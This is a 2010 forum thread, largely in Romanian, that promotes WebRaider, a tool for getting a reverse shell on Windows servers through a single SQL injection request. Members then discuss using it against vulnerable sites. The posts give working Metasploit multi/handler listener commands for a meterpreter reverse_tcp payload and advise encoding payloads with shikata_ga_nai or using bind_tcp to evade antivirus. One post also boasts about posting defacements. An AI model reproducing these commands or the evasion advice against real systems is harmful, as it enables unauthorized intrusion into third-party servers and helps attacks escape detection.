begood Posted March 3, 2010 Report Posted March 3, 2010 (edited) We have been waiting on Mr. Mavituna on releasing WebRaider, since the first day we heard him talk about it. Now, it is finally out and is open source! We were waiting for something like this because as of now, other tools that perform a similar function have different dependencies. This one has depends on the tool that we already rely on.So, what is so special about this tool. For starters, this tool has sponsorship from NetSparker, the tool that claims to be false positive free! Second, it uses a stripped down version of Metasploit! Third, it involves only one request for exploitation and is therefore faster! Infact, the idea of behind this tool is simple – get a reverse shell from an SQL Injection without using TFTP, FTP, etc. to upload the initial payload!Here are a few features of WebRaider:* It’s only one request therefore faster,* Simple, you don’t need a tool you can do it manually by using your browser or a simple MITM proxy,* just copy paste the payload,* CSRF(able), It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell* It’s not fixed, you can change the payload,* It’s short, Generally not more than 3.500 characters,* Doesn’t require any application on the target system like FTP, TFTP or debug.exe* Easy to automate.Normally during an SQL exploitation, we have to depend on tools such as debug.exe and the HTTP protocol limitation of 64kb’s etc. Now, all of this is easy with WebRaider. It does it all! WebRaider uses a VBScript to encode and decode the binary data, add some more functions that will make this work when executed on the target system, arrange this SQL injection on one line and that is all!We haven’t had much time to play around with this beauty. We will keep you updated as and when we play with this! Download WebRaider version 0.2.3.7 here. Edited March 3, 2010 by begood Quote
begood Posted March 3, 2010 Author Report Posted March 3, 2010 (edited) upload payload via sqlicustom listener examples CustomListenerSamples Bash#!/bin/shmsfcli3 exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=[YOURIP] LPORT=[PORT] EWindows Batchruby.exe msfcli exploit/multi/handler LHOST=[YOURIP] LPORT=[PORT] PAYLOAD=windows/meterpreter/reverse_tcp Ei.e."D:\Program Files\Metasploit\Framework3\bin\ruby.exe" "D:\Documents and Settings\UserXP\Application Data\msf32\msfcli" exploit/multi/handler LHOST=12.12.12.72 LPORT=6666 PAYLOAD=windows/meterpreter/reverse_tcp EWhitepaperWeaponized SQLi//A new haxor generation will rise//Sa vad cat mai multe deface-uri postate la "club showoff" !PS: payloadurile le poti face in metasploit, merge si pe linux si pe windows. Edited March 3, 2010 by begood Quote
Guest Nemessis Posted March 3, 2010 Report Posted March 3, 2010 Probabil sunt eu idiot dar nu imi pwneaza shell cu toate ca i-am dat site-uri vulnerabile. Quote
begood Posted March 3, 2010 Author Report Posted March 3, 2010 Probabil sunt eu idiot dar nu imi pwneaza shell cu toate ca i-am dat site-uri vulnerabile.payloadul default e pentru servere care ruleaza pe windows. ai verificat ? Quote
Guest Nemessis Posted March 3, 2010 Report Posted March 3, 2010 Da. Asp cu mysql instalat. Ai vreun site pe care ai testat tu si pe care a functionat? Quote
begood Posted March 3, 2010 Author Report Posted March 3, 2010 (edited) Da. Asp cu mysql instalat. Ai vreun site pe care ai testat tu si pe care a functionat?poate serverul ruleaza un antivirus, de ce nu generezi un custom payload cu metasploit. encoding = shikata_ga_nai ... sa zicem bind_tcp pentru a nu fi detectat de av.uite tutoriale folositoarelista de shellcodes : http://milw0rm.com/shellcode/n-am testat inca, trebuie sa fac rost de un vpn intai.LE: INCA CEVA http://www.mavitunasecurity.com/blog/webraider/ Edited March 3, 2010 by begood Quote
Guest Nemessis Posted March 3, 2010 Report Posted March 3, 2010 I hate metasploit Cand ma trezesc din somn o sa imi mai prind urechile putin prin el. Quote
